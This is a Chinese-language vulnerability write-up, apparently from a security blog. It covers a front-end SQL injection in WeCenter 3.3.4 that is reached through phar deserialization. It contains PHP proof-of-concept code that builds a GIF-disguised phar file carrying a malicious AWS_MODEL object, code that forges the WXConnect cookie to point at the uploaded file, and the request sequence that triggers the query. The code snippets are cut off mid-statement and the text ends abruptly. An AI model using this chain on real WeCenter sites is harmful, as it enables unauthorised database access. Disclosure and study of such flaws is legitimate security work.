WeCenter_3.3.4_前台sql注入

# WeCenter 3.3.4 前台sql注入

==========================

一、漏洞简介
————

二、漏洞影响
————

WeCenter 3.3.4

三、复现过程
————

### 任意sql语句执行

**system/aws\_model.inc.php:\_\_destruct()** 方法中存在任意 **SQL**
语句执行。

![](/static/qingy/WeCenter_3.3.4_前台sql注入/img/rId25.png)

### poc

_shutdown_query = $_shutdown_query;
}
}

$sql = array(‘select updatexml(1,concat(0x3a,md5(233),0x3a),1)’);
$evilobj = new AWS_MODEL($sql);
// phar.readonly无法通过该语句进行设置: init_set(“phar.readonly”,0);
$filename = ‘poc.phar’;// 后缀必须为phar,否则程序无法运行
file_exists($filename) ? unlink($filename) : null;
$phar=new Phar($filename);
$phar->startBuffering();
$phar->setStub(“GIF89a“);
$phar->setMetadata($evilobj);
$phar->addFromString(“foo.txt”,”bar”);
$phar->stopBuffering();
?>

### 利用

首先注册账号,并利用上面的poc生成Phar文件,并将运行后将生成的`shell.gif`通过编辑器的上传功能上传到服务器上。

![](/static/qingy/WeCenter_3.3.4_前台sql注入/img/rId28.png)

记录下上传后的目录

![](/static/qingy/WeCenter_3.3.4_前台sql注入/img/rId29.png)

#### 生成并设置`COOKIE`中的`WXConnect`值

‘1’);
$arr[‘access_user’] = array();
$arr[‘access_user’][‘openid’] = 1;
$arr[‘access_user’][‘nickname’] = ‘naiquan’;
$arr[‘access_user’][‘headimgurl’] = ‘phar://uploads/question/20200107/a3df6f75e11120c22ba0d85519c5d442.gif’;
echo json_encode($arr);
?>

将`headimgurl`的值设置成`phar`伪协议解析的恶意文件后运行,将结果放入Cookie中,前缀可参考Cookie中的其他参数。

#### 访问`app/m/weixin.php`下的`binding_action`

![](/static/qingy/WeCenter_3.3.4_前台sql注入/img/rId32.png)

提示绑定微信成功后进行下一步

#### 访问`app/account/ajax.php`下的`synch_img_action`

![](/static/qingy/WeCenter_3.3.4_前台sql注入/img/rId34.png)

任意

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容